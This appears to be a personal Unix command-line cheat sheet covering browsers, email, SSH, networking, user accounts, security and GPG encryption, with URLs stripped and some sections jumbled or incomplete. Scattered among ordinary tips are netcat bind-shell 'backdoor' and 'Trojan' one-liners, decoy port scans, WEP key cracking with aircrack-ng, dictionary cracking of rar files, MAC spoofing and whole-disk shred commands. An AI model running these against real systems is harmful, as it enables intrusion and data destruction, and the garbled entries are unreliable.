galeon - a small browser for gnome
iceweasel - debian firefox
abrowser - unbranded firefox
dillo - a very small browser

a text mode browser with table support

 links  press <f9> to set a menu of options

create a lynx macro by recording a session

 lynx -cmd_log logfilename

the '-cmd_log' switch should go after a starting page

 lynx -cmd_log logfile    this works
 lynx -cmd_log logfile    doesnt work!

replay a macro recorded with the -cmd_log switch

 lynx -cmd_script=/path/to/logfilename

make lynx accept all cookies (also setable in the configuration file)

 lynx -accept_all_cookies

w3m can display tables and with "w3m-img" images


output only text, with underscores, of the previous URL, and save it to the file 'winter_dreams', type (all on one line):

 lynx -dump -nolist -underscore > winter_dreams

print the pure text, with underscores, of the previous URL in a Times Roman font, type (all on one line):

 lynx -dump -nolist -underscore | enscript -B

view the 'new york times' archive with user-name and password 'cypherpunks'

 lynx -auth=cypherpunks:cypherpunks

save the URL as an annotated text file, 'mynews'

 lynx -dump -number_links -auth=cypherpunks:cypherpunks > mynews

If you want a lynx file to go to a webpage through a password form, then dont press 'q' quit at the end of the recording or else this will be included in the macro. Quit lynx with control-c instead.


Email Electronic Mail ‹↑›

Sort a one-per-line list of email address, weeding out duplicates

 sed 's/[ \t]*$//' < emails.txt | tr 'A-Z' 'a-z' | sort | uniq > emails_sorted.txt

extract email adresses from some file (or any other pattern)

 grep -Eio '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'

Connect to SMTP server using STARTTLS

 openssl s_client -starttls smtp -crlf -connect

Email HTML content

 mailx -s "HTML Hello" -a "Content-Type: text/html" < body.htm

Block the 6700 worst spamhosts

 wget -q -O - | grep ^127 >> /etc/hosts

Alpine ‹↑›

Alpine is a 'console' based (curses) email client, allegedly used by linus torvalds. It uses the pico text editor to edit mail.

Mutt ‹↑›

the official site.
Mutt is apparently in active development. (Mutt 1.5.20 was released on June 14, 2009). Mutt uses an external text editor to edit mail

Send email with one or more binary attachments

 echo "Body goes here" | mutt -s "A subject" -a /path/to/file.tar.gz

Create mails array from .mutt-alias file.

 muttlst(){ for i in $*;do mails+=($(grep -wi "$i" .mutt-alias|awk '{print $NF}'));done;}

Webmail ‹↑›

Check your unread Gmail from the command line

 curl -u username --silent "" | perl -ne 'print "\t" if /<name>/; print "$2\n" if /<(title|name)>(.*)<\/\1>/;'

Attachments ‹↑›

Decode a MIME message

 munpack file.txt

Send a local file via email

 echo "see attached file" | mail -a filename -s "subject" email@address

Send a binary file as an attachment to an email

 uuencode archive.tar.gz archive.tar.gz | mail -s "Emailing: archive.tar.gz"

Send a local file as an attachment via email

 mutt -s "Message Subject Here" -a attachment.jpg </dev/null

Send a local file via email

 mpack -s "Backup: $file" "$file"

Email Addresses ‹↑›

extract email adresses from some file (or any other pattern)

 grep -Eio '([[:alnum:]_.]+@[[:alnum:]_]+?\.[[:alpha:].]{2,6})' file.html

Move all but the newest 100 emails to a gzipped archive

 find $MAILDIR/ -type f -printf '%T@ %p\n' | sort --reverse | sed -e '{ 1,100d; s/[0-9]*\.[0-9]* \(.*\)/\1/g }' | xargs -i sh -c "cat {}&&rm -f {}" | gzip -c >>ARCHIVE.gz

Smtp Protocol ‹↑›

python smtp server

 python -m smtpd -n -c DebuggingServer localhost:1025

Create AUTH PLAIN string to test SMTP AUTH session

 printf '\!:1\0\!:1\0\!:2' | mmencode | tr -d '\n' | sed 's/^/AUTH PLAIN /'

Older Mail Systems ‹↑›

send an email message to

Subject: Hello Hi there, long time no talk! I'm just learning how to use ,,,

send an email message to user mrs on your local system

mail mrs Subject: are you going to the party tonight? C-d ,,,

mail the contents of the text file 'trades' to the email address

 mail < trades

mail the text of the URL [28] as annotated text to the email address

 mail < lynx -dump -number_links

insert a copy of the current mail message into the body of the message you are writing, and then open the message in the default text editor ~f

output the location of your INBOX

 echo $MAIL
Usually, the INBOX location is in the '/var/spool/mail' directory, and has the same name as your username -- so if your username is mrs, your

see if you have mail

Mail version 8.1 6/6/93. Type ? for help. "/var/spool/mail/m": 3 messages 3 new ,,,

read the next unread message in mail &

read message number three in mail

 & 3

exit mail and revert your INBOX to its state before you started mail

 & x

delete the message you just read

 & d

delete message 3

 & d3

delete messages 10 through 14

 & d10-14

view the mail folder '~/email/mrs' in elm

 elm -f ~/email/mrs

view the contents of all of the email folders in your '~/email' directory

 cat ~/email/* > allmessages
 elm -f allmessages

turn biff on

 biff y    or put in .bashrc

see what biff is set to


see also xbiff,

see how many email messages you have waiting


count the number of email messages in the mail folder '~/email/saved'

 messages ~/email/saved

output a list showing sender names and subjects of your incoming mail


output a list with sender names and subjects in the file '~/email/saved'

 frm ~/email/saved

verify that the email address is valid


verify all of the email addresses contained in the file 'mail-list'

 vrfy -f mail-list

mail the JPEG file 'dream.jpeg' in the current directory to

metasend To: ,,,

view the current history log with lynx

 lynx ~/.browser-history/history-log.html

find URLs visited in the year 2000 titles containing the word 'Confessions'

 zgrep Confessions ~/.browser-history/history-log-2000*

open the URL in Mozilla from a shell script

 mozilla -remote 'openURL('

go back to the last URL you visited

  type [ALT] [<-],

forward to the next URL in your history,

  type [ALT] [->].

open your bookmarks file in a new window, type [ALT]-b.

archive the Web site at, only archiving the '/~mbt' directory, and writing log messages to a file called 'uk.log'

 wget -m -t3 -I /~mbt

add 'HEIGHT' and `WIDTH' parameters to the file `index.html',

 imgsizer index.html

peruse the file 'index.html' with its HTML tags removed

 unhtml index.html | less

remove the HTML tags from 'index.html' and put the output in 'index.txt'

 unhtml index.html > index.txt

print a copy of in typescript manuscript form

 lynx -dump -underscore -nolist | pr -d | enscript -B

print a PostScript copy of the document at the URL

 html2ps | lpr

write a copy of the document at the URL with all hypertext links underlined

 html2ps -u -o

validate the HTML in the file 'index.html'

 weblint index.html

connect to the system

Trying Connected to kanga.INS.CWRU.Edu.

disconnect from a remote Linux system


temporarily return to a local shell prompt faraway-system$ C-[ telnet> z

return to the remote system

faraway-system$ In the first of the two preceding examples, the escape character C-[

make an anonymous ftp connection to

Connected to 220-Welcome to LEO.ORG.

change to the '/pub' directory on the remote system and look at the files that are there ftp> cd /pub 250 Directory changed to /pub.

put a copy of the file 'thyme.rcp' from the current directory on the local system to the current directory of the remote system, type: ftp> put thyme.rcp

change to the parent directory of the current directory on the local system ftp> lcd .. Local directory now /home/james/demos

download the file 'INDEX.gz' in the current directory on the remote system, saving it to your '~/tmp' directory ftp> lcd ~/tmp Local directory now /home/james/tmp

output a list of all newsgroups that match the pattern 'society'

 nngrep society
Use the '-u' option to only search through unsubscribed groups. This is

output a list of all unsubscribed-to newsgroups that match the pattern 'society'

 nngrep society
In the previous example, if you were already subscribed to the group

The Ppp Protocol ‹↑›

start a PPP connection


stop a PPP session


Sending And Receiving Faxes ‹↑›

Debian: 'efax'

fax a copy of the file 'resume.txt' to the number `555-9099', using DTMF tone dialing

 efax -d /dev/modem -t T555-9099 resume.txt

fax all of the files with the '.fax' extension in the current directory to the number '555-9099', using DTMF tone dialing

 efax -d /dev/modem -t T555-9099 *.fax

fax all of the files listed in the file 'fax.list' to the number '555-9099', dialing `9' first to obtain an outside line, and using DTMF tone dialing

 efax -d /dev/modem -t T9,555-9099 $(cat fax.list)

set up efax to receive an incoming fax, saving the session log to a file, 'faxlog'

 efax -d /dev/modem -kZ -w -iS0=1 2>&1 >> faxlog
This command starts efax and sets up the modem to wait for an incoming

automatically receive any incoming fax messages

efax: Wed Feb 24 08:38:52 1999 efax v 0.8a (Debian release 08a-6) Copyright 1996 Ed Casas

convert the file 'chart.pbm' for faxing

 efix -i pbm chart.pbm > chart.fax
This command converts a copy of the file 'chart.pbm' to the `tiffg3' fax format, writing it to a file called 'chart.fax'. The original PBM

convert the PostScript file '' to fax format

 gs -q -sDEVICE=tiffg3 -dSAFER -dNOPAUSE -sOutputFile=resume.fax < /dev/null

convert '19990325.001', a received fax file, to a PostScript file

 efix -o ps 19990325.001 >

dial the number '368-2208'


Remote Shells ‹↑›

Create a backdoor on a machine to allow remote connection to bash

 /bin/bash | nc -l 1234   rather unwise...

Ssh ‹↑›

Script executes itself on another host with one ssh command

web browsers
lynx - the classic text mode browser debian: lynx, lynx-cur
elinks - displays utf8 menus, bad default colours
w3m - very strange key bindings japanese oriented
links - doesnt seem to have utf8 support

connect via ssh using mac address

 sudo arp -s 00:35:cf:56:b2:2g temp && ssh root@

ssh and attach to a screen in one line.

 ssh -t user@host screen -x <screen name>

Forward port 8888 to remote machine for SOCKS Proxy

 ssh -D 8888

Copy ssh keys to user@host to enable password-less ssh logins.

 ssh-copy-id user@host

Attach screen over ssh

 ssh -t remote_host screen -r

login to an ssh server as root ''

 alias s='ssh -l root'

Ssh Tunnels ‹↑›

start a tunnel from some machine's port 80 to your local port 2001

 ssh -N -L2001:localhost:80 somemachine

plink ssh connect

 plink lyu0@mysshserver -pw 123456

Transfer large files/directories with no overhead over ssh

 ssh user@host "cd targetdir; tar cfp - *" | dd of=file.tar

Create an SSH connection (reverse tunnel) through your firewall.

 ssh -R 2001:localhost:22 username@<remote server ip>

Ssh Keys ‹↑›

create an alias to logon to the sourceforge shell

 alias sfshell='ssh -t user, create'

Copy your SSH public key on a remote machine for passwordless access

 cat ~/.ssh/*.pub | ssh user@remote-system 'umask 077; cat >>.ssh/authorized_keys'

Remove invalid key from the known_hosts file for the IP address

 ssh-keygen -R `host hostname | cut -d " " -f 4`

Remove invalid host keys from ~/.ssh/known_hosts

 ssh-keygen -R \[localhost\]:8022

SSH connection through host in the middle

 ssh -t reachable_host ssh unreachable_host

ssh autocomplete on the known hosts

 complete -W "$(echo `cut -f 1 -d ' ' ~/.ssh/known_hosts | sed -e s/,.*//g | uniq | grep -v "\["`;)" ssh

find the difference between two nodes

 diff <(ssh nx915000 "rpm -qa") <(ssh nx915001 "rpm -qa")

Copy something to multiple SSH hosts with a Bash loop

 for h in host1 host2 host3 host4 ; { scp file user@h$:/path/; }

Setup a persistant SSH tunnel w/ pre-shared key authentication

 autossh -f -i /path/to/key -ND local-IP:PORT User@Server

live ssh network throughput test

 pv /dev/zero|ssh $host 'cat > /dev/null'

setup a tunnel from destination machine port 80 to localhost 2001,

 ssh -N -L2001:localhost:80 -o "ProxyCommand ssh someuser@hubmachine nc -w 5 %h %p" someuser@destinationmachine

Enter your ssh password one last time

 cat .ssh/ | ssh "[ -d .ssh ] || mkdir .ssh ; cat >> .ssh/authorized_keys"

open a seperate konsole tab and ssh to each of N servers

 for i in $(cat listofservers.txt); do konsole --new-tab -e ssh $i; done

browse files on an ssh server


Expect ‹↑›

Expect is a useful tool to allow the scripting of tasks which would normally require some user interaction. Expect includes its own simple scripting language. Expect is available on the majority of unix type operating systems, including Mac OSX.

Entire books exist about expect, Expect is an extension to the 'tcl' language.

 [ $1 == "client" ] && hostname || cat $0 | ssh $1 /bin/sh -s client

set the variable 'x' to the value 30

 set x 30

make a script timeout after 20 seconds

 set timeout 20

The above is useful when interacting with servers which may not respond.

start the 'ssh' program from within an expect script

 spawn ssh

wait for the program spawn to say exactly "hello!"

 expect "hello!"

wait for the program spawned to say anything with boggle in it

 expect "*boggle*"

send the response "yes" to the spawned program

 send "yes\n"
 send "yes\r"     more or less the same
 send yes\r       also possible, but not always

escape a '-' character in a send command

 send "/-4.5\n"

If we just wrote 'send "-4.5\n"' then expect would think that -4 was a flag and would crash

a simple expect script

    set timeout 20 
    set name [lindex $argv 0] 
    set user [lindex $argv 1]
    set password [lindex $argv 2] 
    spawn telnet $name
    expect "login:"
    send "$user " 
    expect "Password:"
    send "$password "
    interact # hands interaction to the user

The Shell ‹↑›

set command line editing in the 'vi' mode

 set -o vi      gives "vi" like command line editing keystrokes
 set -o emacs   return to the default mode

Ram Memory ‹↑›

View memory utilisation

 sar -r

free swap

 free -b | grep "Swap:" | sed 's/ * / /g' | cut -d ' ' -f2

Find the ratio between ram usage and swap usage.

 sysctl -a | grep vm.swappiness

Monitor memory usage

 watch vmstat -sSM

Virtual Memory ‹↑›

Add temporary swap space

 dd if=/dev/zero of=/swapfile bs=1M count=64; chmod 600 /swapfile; mkswap /swapfile; swapon /swapfile

Clean swap area after using a memory hogging application

 swapoff -a ; swapon -a

vmstat/iostat with timestamp

 vmstat 1 | awk '{now=strftime("%Y-%m-%d %T "); print now $0}'

Disks ‹↑›

check free disk space and display sizes in an easy to read format

 df -h

show file and directory sizes for the current directory

 du -sh *

Hard Disk Partitions ‹↑›

list all hd partitions

 awk '/d.[0-9]/{print $4}' /proc/partitions

show disk partitions and sizes

 sudo fdisk -l

gparted: to repartition a disk

Serial Connections ‹↑›

Test a serial connection

 host A: cat /proc/dev/ttyS0 host B: echo hello > /dev/ttyS0

The Network ‹↑›

Network Information


restart network manager

 sudo /etc/init.d/networking restart

Consolle based network interface monitor

 ethstatus -i eth0

Display ncurses based network monitor

 nload -u m eth0

Show apps that use internet connection at the moment.

 netstat -lantp | grep -i stab | awk -F/ '{print $2}' | sort | uniq

Monitor RX/TX packets and any subsquent errors

 watch 'netstat -aniv'

Most simple way to get a list of open ports

 netstat -lnp

eth-tool summary of eth# devices

 for M in 0 1 2 3 ; do echo eth$M ;/sbin/ethtool eth$M | grep -E "Link|Speed" ; done

Check the status of a network interface

 mii-tool [if]

find all active IP addresses in a network

 arp-scan -l

Create a persistent connection to a machine

 ssh -MNf <user>@<host>

directly ssh to host B that is only accessible through host A

 ssh -t hostA ssh hostB

Show all programs on UDP and TCP ports with timer information

 netstat -putona

ping the host


mtr, better than traceroute and ping combined


Lists all listening ports together with the PID of the associated

 netstat -tlnp

finger the user

finger [] Login: bradley Name: Bradley J Milton ,,,

output the users who are currently logged in to the system


find the IP address of the host



find the host name that corresponds to the IP address

 dig -x

output the name of the Whois Server for


view the domain record for, using the

 whois -h

send the message 'get up!' to the terminal where user 'sleepy' is logged in

 write sleepy get up

output the contents of '/etc/motd' to all logged-in terminals,

 wall /etc/motd

output the text 'hello?' to all logged-in terminals

 wall hello?

disallow messages to be written to your terminal

 mesg n

output the current access state of your terminal


request a chat with the user


view network traffic with protocols: wireshark

find which tcp ports are currently in use

 lsof | grep TCP   lsof lists all open unix 'files' including pipes

lots of detailed information

 lshw -C Network

restart the gnome graphical network manager apple

 sudo restart network-manager

Analysing The Network ‹↑›

make an alias (command) to ping a yahoo server without any dns

 alias testnet='ping'
this can determine if the problem is dns or tcpip

Router discovery

 sudo arp-scan -interface eth0

Show all machines on the network

 nmap 192.168.0-1.0-255 -sP

Localize provenance of current established connections

 for i in $(netstat --inet -n|grep ESTA|awk '{print $5}'|cut -d: -f1);do geoiplookup $i;done

List the number and type of active network connections

 netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c

Sniffing Network Traffic ‹↑›

Remotely sniff traffic and pass to snort

 ssh root@pyramid \ "tcpdump -nn -i eth1 -w -" | snort -c /etc/snort/snort.conf -r -

Tcpip Ports ‹↑›

List all TCP opened ports on localhost in LISTEN mode

 netstat -nptl

which program is this port belongs to ?

 lsof -i tcp:80

list all opened ports on host

 nmap -p 1-65535 --open localhost

list all opened ports on host

 sudo lsof -P -i -n -sTCP:LISTEN

Show apps that use internet connection at the moment.

 netstat -lantp | grep -i establ | awk -F/ '{print $2}' | sort | uniq

Port Knocking!

 knock <host> 3000 4000 5000 && ssh -p <port> user@host && knock <host> 5000 4000 3000

Show apps that use internet connection at the moment.

 ss -p

netcat as a portscanner

 nc -v -n -z -w 1 22-1000

Ip Addresses ‹↑›

Get My Public IP Address

 wget -qO - | egrep -m1 -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

What is my ip?

 curl -s | grep -Eo '[0-9\.]+'

What is my ip? (hardened)

 curl --connect-timeout 3

geoip information

 GeoipLookUp(){ curl -A "Mozilla/5.0" -s "$1" | grep "^IP.*$1" | html2text; }

Get My Public IP Address

 curl -s

display ip address

 curl -s | grep '<title>' | sed -e 's/<[^>]*>//g'

Filter IPs out of files

 egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' file.txt

Dhcp Dynamic Host Control Protocol ‹↑›

expect related tools
expectk - a graphical front end
autoexpect - create a script from an interactive session
.output messages...

get IPs with a DHCP lease

 egrep "^lease" /var/lib/dhcp/db/dhcpd.leases |awk '{ print $2 }'

randomize hostname and mac address, force dhcp renew. (for

 dhclient -r && rm -f /var/lib/dhcp3/dhclient* && sed "s=$(hostname)=REPLACEME=g" -i /etc/hosts && hostname "$(echo $RANDOM | md5sum | cut -c 1-7 | tr a-z A-Z)" && sed "s=REPLACEME=$(hostname)=g" -i /etc/hosts && macchanger -e eth0 && dhclient

Ping ‹↑›

ping a range of IP addresses

 nmap -sP

ping a host until it responds, then play a sound, then exit

dhclient - sets up a dhcp client from the command line

Ifconfig ‹↑›

how to use ifconfig
setup ethernet network device specifying an ip address
  ifconfig eth0 netmask broadcast up

Proxy Servers ‹↑›

Create a single-use TCP proxy with debug output to stderr

 socat -v tcp4-l:<port> tcp4:<host>:<port>

Create a single-use TCP (or UDP) proxy

 nc -l -p 2000 -c "nc 3000"

Mac Addresses ‹↑›

A 'mac' address is a unique number associated with a given network interface on a computer. A network interface is a wireless card, ethernet card, modem, etc. No 2 network devices in the world have the same mac address, or at least shouldnt.

how to change ('spoof') the mac address for a given network device on the local computer.
www: deb:
macchanger a package to change the mac address for a given network interface. this may not work with all wireless cards.
Determine MAC address of remote host when you know its IP address

Insert a colon between every two digits

 sed 's/\(..\)/\1:/g;s/:$//' mac_address_list

find the mac address of all active network interfaces (wireless, ethernet ...)

 ifconfig -a | grep HWaddr

show the mac address to ip table for the local computer


Resets your MAC to a random MAC address to make you harder to

 ran=$(head /dev/urandom | md5sum); MAC=00:07:${ran:0:2}:${ran:3:2}:${ran:5:2}:${ran:7:2}; sudo ifconfig wlan0 down hw ether $MAC; sudo ifconfig wlan0 up; echo ifconfig wlan0:0

change or 'spoof' the mac address of the ethernet network device

    ifconfig eth0 down
    ifconfig eth0 hw ether 00:80:48:BA:d1:30
    ifconfig eth0 up
    ifconfig eth0 | grep HWaddr

change the mac address for the wireless card 'wlan0' to the specified

 macchanger --mac 00:00:13:37:00:00 wlan0
this only works if the wireless card driver supports the operation

Monitoring Network Bandwidth ‹↑›

watch data usage on eth0

 watch ifconfig eth0

monitor bandwith and data transfer

 iptables, bmon, vnstat, ntop, bwm-ng, iftop, iptraf, darkstat, mrtg ...

output bmon data as html

 bmon -O html:path=/home/var/www/html/data/bmon

create a new database with data about the eth0 (ethernet interface)

 vnstat -u -i eth0

store data about the 'ppp0' interface (a modem, or wireless usb dongle) etc

 sudo vnstat -u -i ppp0

show an ascii graph of data transfer by the hour

 vnstat -h

look for the number of RX bytes and TX bytes of the active interface


Network Configuration ‹↑›

udp uses no acknowledgement used by: tftp (trivial file transfer protocol) , snmp (simple network manage protocol), dhcp, dns uses port numbers uses ip the only improvement on ip are port numbers

tcpdump, ethereal to see network traffic

monitor the ethernet network traffic

 while :; do netstat -in | grep ath0 ; sleep 1 ; done

show network interfaces

 ip link show
 netstat -in

list the routing table

 ip route show

configure a network connection via dhcp


Wireless Networks ‹↑›

 beepwhenup () { echo 'Enter host you want to ping:'; read PHOST; if [[ "$PHOST" == "" ]]; then exit; fi; while true; do ping -c1 -W2 $PHOST 2>&1 >/dev/null; if [[ "$?" == "0" ]]; then for j in $(seq 1 4); do beep; done; ping -c1 $PHOST; break; fi; done; }

connect to a network called 'beach cafe'

 iwconfig etho essid "beach cafe"

connect to the 'uconnect' network

 iwconfig eth0 essid uconnect

connect with a wep key

 iwconfig eth0 essid uconnect key s:Password
 iwconfig eth0 essid uconnect key 1fa24 hex notation

get a dhcp ip address from the network

 dhclient   run this after 'iwconfig'

show the mac address of the access point

 iwgetid -ap

show available encryption algorithms

 iwlist encryption

show transmitter power

 iwlist power

show the status of the wireless interface eth1

 iwconfig eth1

If an ESSID:"name" appears then connected

show information about available wireless networks in range

 iwlist scan

view all networks reachable from the ra0 interface (wireless card)

 iwlist ra0 scan

very mysterious

 iwpriv  ??

Wireless Security ‹↑›

The official site
iwlist - show available wlans
iwgetid - shows interfaces
iwspy - show other lan clients
iwevent - monitor wlans
dhclient - set up dhcp clients

sniff wireless traffic using the 'ra0' interface

 sudo airodump-ng ra0

Put the wireless card into monitor mode

 airmon-ng start <interface> <channel>

capture wireless packets on channel 11 from the given mac address

 airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0
the captured packets get written to a file prefixed 'dump'>40000 packets should be captured in order to crack the key

attempt to crack the wep key using captured data in 'dump-01.cap'

 aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

use several captured data packet files using a wildcard

 aircrack-ng -b 00:01:02:03:04:05 dump*.cap

test if the 'ra0' wireless card supports 'injection'

 aireplay-ng -9 ra0      or run with sudo
injection is required for speeding up wireless attacks

User And Group Accounts ‹↑›

Unix style operating systems use user and group accounts to attempt to control access to files, folders and other resources. The super-user on a unix-style operating system is called the 'root' user

Users ‹↑›

find out who you logged onto the machine as

 who am i

find out what users are logged onto the system


display which user is running a process from a given port name

 fuser -nu tcp 3691

list what rights you will have after a 'sudo' command

 sudo -l

quickly add user accounts to the system and force a password

 for name in larry moe schemp; do useradd $name; echo 'password' | passwd --stdin $name; chage -d 0 $name; done

Add existing user to a group

 usermod -a -G groupname username

list files not owned by any user or group

 find / -nouser -o -nogroup -print

list your group memberships

prints 'steward galley crew'

list the group memberships of user blackbeard

 groups blackbeard

output a list of the members of the galley group

 members galley

change the group ownership of file 'cruise' to bridge

 chgrp bridge cruise

give group ownership of the 'maps' directory and all the files it contains to the bridge group

 chgrp -R bridge maps

write-protect the file 'cruise' so that no other users can change it

 chmod go-w cruise

make the file 'cruise' private from all users but yourself

 chmod go= cruise

make the file 'cruise' both world readable and world writable

 chmod a+rw cruise

give execute permission to all users for the file 'myscript'

 chmod a+x myscript

Get a quick list of all user and group owners of files and dirs

 find -printf '%u %g\n' | sort | uniq


www: deb:
acct show information about users
www: deb:
quota allows the administrator to place disk quotas on users account
Remove executable bit from all files in the current directory
 find . ! -type d -exec chmod -x {}\;

Switch to a user with "nologin" shell

 sudo -u username bash

Recursive chmod all files and directories within the current folder

 chmod -R 774 .

Create a listing of all possible permissions and their octal

 touch /tmp/$$;for N in `seq -w 0 7777|grep -v [89]`; do chmod $N /tmp/$$; P=`ls -l /tmp/$$ | awk '{print $1}'`; echo $N $P; done;rm /tmp/$$

show all user accounts on the local computer

 cat /etc/passwd
 cat /etc/passwd | grep /home  shows only non-application users

List all groups and the user names that were in each group

 for u in `cut -f1 -d: /etc/passwd`; do echo -n $u:; groups $u; done | sort

add a new user account


add a new group account


change ownership of a file to another user


change the group ownership of a file or files


print what groups a user belongs to


change the password for the 'mjb' user account

 passwd mjb

find all files on the computer owned by the 'bob' user

 find / -user bob -ls

File Permissions ‹↑›

give any files that don't already have it group read permission

 find . -type f ! -perm /g=r -exec chmod g+r {} +

remove executable bit from all files in the current directory

 chmod -R -x+X *

recursively reset file or folder permissions

 find public_html/stuff -type d -exec chmod 755 {} + -or -type f -exec chmod 644 {} +

Change the ownership of all files owned by one user.

 find /home -uid 1056 -exec chown 2056 {} \;

create directory and set owner/group/mode in one shot

 install -o user -g group -m 0700 -d /path/to/newdir

Security ‹↑›

Unix security checker


Net Security ‹↑›

find running binary executables that were installed irregularly

 cat /var/lib/dpkg/info/*.list > /tmp/listin ; ls /proc/*/exe |xargs -l readlink | grep -xvFf /tmp/listin; rm /tmp/listin

Scan Network for Rogue APs.

 nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan

Create a backdoor on a machine to allow remote connection to bash

 nc -vv -l -p 1234 -e /bin/bash

Find brute force attempts on SSHd

 cat /var/log/secure | grep sshd | grep Failed | sed 's/invalid//' | sed 's/user//' | awk '{print $11}' | sort | uniq -c | sort -n

Use a decoy while scanning ports to avoid getting caught by the

 sudo nmap -sS -D

Conficker Detection with NMAP

 nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES

Find files with root setuids settings

 sudo find / -user root -perm -4000 -print

Trojan inverse shell

 nc -l -p 2000 -e /bin/bash

Check for login failures and summarize

 zgrep "Failed password" /var/log/auth.log* | awk '{print $9}' | sort | uniq -c | sort -nr | less

Block known dirty hosts from reaching your machine

 wget -qO -|awk '!/#|[a-z]/&&/./{print "iptables -A INPUT -s "$1" -j DROP"}'

retrieve top ip threats from

 curl -s|grep "ipinfo.html"|awk -F"ip="

Locking and unlocking files and mailboxes


Add a line for your username in the /etc/sudoers file

 echo 'loginname ALL=(ALL) ALL' >> /etc/sudoers

Shredding ‹↑›

Shredding data means deleting data in a way that makes that data not recoverable, by analogy with the process of shredding a document.

Securely destroy data (including whole hard disks)

 shred targetfile

securely overwrite a file with random junk, rename it to clear

 shred -vzu /tmp/junk-file-to-be-shredded

Shred an complete disk, by overwritting its content 10 times

 sudo shred -zn10 /dev/sda

Securely destroy data on given device

 # for i in $(seq 1 25); do dd if=/dev/urandom of=<your disk> bs=1M ; done

Firewalls ‹↑›

Redirect incoming traffic to SSH, from a port of your choosing

 iptables -t nat -A PREROUTING -p tcp --dport [port of your choosing] -j REDIRECT --to-ports 22

Tired of switching between proxy and no proxy? here's the solution

 iptables -t nat -A OUTPUT -d ! -p tcp --dport 80 -j DNAT --to-destination

Save iptables firewall info

 sudo iptables-save > /etc/iptables.up.rules

Remove an IP address ban that has been errantly blacklisted by

 denyhosts-remove $IP_ADDRESS

watch iptables counters

 watch 'iptables -vL'

Block all IP addresses and domains that have attempted brute

 (bzcat BZIP2_FILES && cat TEXT_FILES) | grep -E "Invalid user|PAM" | grep -o -E "from .+" | awk '{print $2}' | sort | uniq >> /etc/hosts.deny

Privacy ‹↑›

www: bleachbit
eliminate all sorts of caches, for the sake of privacy
www: gpa
a graphical user interface to 'gpg'
www: seahorse
the gnome graphical front-end for gpg
www: kgpg
the kde front end
www: firegpg
use gpg with webmail in firefox
www: psi
use gpg with jabber xmpp im clients
www: enigmail
integrate gpg with thunderbird email client
wireless security auditing programs
aircrack-ng obtain wireless network passwords
kismet see wireless networks in range and clients

see if gpg is installed

 which gpg
 which gpg2    the newer version

make a public key for somebody to send you stuff

 gpg --gen-key
 input name and email address

The new key gets put on a key-ring

see what keys are on your keyring (like the one you just made)

 gpg --list-keys

show the fingerprint for a key

 gpg --fingerprint

'fingerprints' are used to make sure that the public key for somebody really is from them.

export the key with the given id to a file 'key.asc' and send to people

 gpg --armor --export 86d68542 --output key.asc

send the public key with given id to the mit 'public key server'

 gpg --keyserver=x-hkp:// --send-keys 86d68542

or use the web interface at to submit a public key paste the '.asc' file created before with --armor

import a key file containing somebodies public key

 gpg --import key.asc

Then you use this key to encrypt things which you are going to send to them.

search the 'mit' public key server for a public key belonging to Ben stewart

 gpg --keyserver=x-hkp:// --search-keys Ben Stewart

Then enter a number corresponding to the desired user to enter that key into your keyring

Keyring ‹↑›

private keys normally stored in


public keys stored in


Signing Keys ‹↑›

In order to verify that a public key really is from somebody, signing is used. The more genuine people sign a key as authentic the more likely it is that it will be authentic

sign the public key for 'bob'

 pgp --edit-key

Then send this signed key to the public key server with the same command as before.

list who has signed the public key for 'bob stewart'

 gpg --list-sigs

Encrypting ‹↑›

encrypt 'file.pdf' for sending to user (using his public key)

 gpg --encrypt --recipient '' file.pdf

creates a file 'file.pdf.gpg' which is encrypted

encrypt a file for yourself (just use your own public key to encrypt it)

 gpg --encrypt --recipient '' file.pdf

Decrypting ‹↑›

decrypt a file sent to you (uses your private key)

 gpg --output f.txt --decrypt f.txt.asc

this prompts for your keyring passphrase

create a file 'leaks.txt.asc' which is signed as being from you but not encrypted

 gpg --clearsign leaks.txt

verify that a 'signed' file is from the person who it says it is

 gpg --verify leaks.txt

create a revocation certificate which is useful if you forget a password

 gpg --gen-revoke 8657698

Send the revocation certificate to the public key server if you forget a password for a key

Encryption ‹↑›

the 2 keys
your public - other people use it to send you stuff
your private - decrypt things sent to you
other persons public - you use it to send things to them
other person private - they use it to decrypt things sent to them

Quickly generate an MD5 hash for a text string using OpenSSL

 echo -n 'text to be encrypted' | openssl md5

gpg decrypt several files

 gpg --allow-multiple-messages --decrypt-files *

Safely store your gpg key passphrase.

 pwsafe -qa "gpg keys"."$(finger `whoami` | grep Name | awk '{ print $4" "$5 }')"

quickly encrypt a file with gnupg and email it with mailx

 cat file.txt | gpg2 --encrypt --armor --recipient "Disposable Key" | mailx -s "Email Subject"

Mount a truecrypt drive from a file from the command line

 su -c "truecrypt --non-interactive truecrypt-file cryptshare -p PASSWORD"

Create/open/use encrypted directory

 encfs ~/.crypt ~/crypt

Encrypted archive with openssl and tar

 tar c folder_to_encrypt | openssl enc -aes-256-cbc -e > secret.tar.enc

Encrypted archive with openssl and tar

 openssl des3 -salt -in unencrypted-data.tar -out encrypted-data.tar.des3

rot13 simple substitution cipher via command line

 alias rot13='perl -pe "y/A-Za-z/N-ZA-Mn-za-m/;"'

Cracking a password protected .rar file

 for i in $(cat dict.txt);do unrar e -p$i protected.rar; if [ $? = 0 ];then echo "Passwd Found: $i";break;fi;done

MD5 SUMS ....

Create md5sum of files under the current dir excluding some

 find . -type d \( -name DIR1 -o -name DIR2 \) -prune -o -type f -print0 | xargs -r0 md5sum

recursively md5 all files in a tree

 find ./backup -type f -print0 | xargs -0 md5sum > /checksums_backup.md5

Verify MD5SUMS but only print failures

 md5sum --check MD5SUMS | grep -v ": OK"

Gpg ‹↑›

gpg stands for gnu pretty good privacy, more or less.

Receive, sign and send GPG key id

 caff <keyid>

import gpg key from the web

 curl -s | gpg --import

gpg decrypt a file

 gpg --output foo.txt --decrypt foo.txt.pgp

add a gpg key to aptitute package manager in a ubuntu system

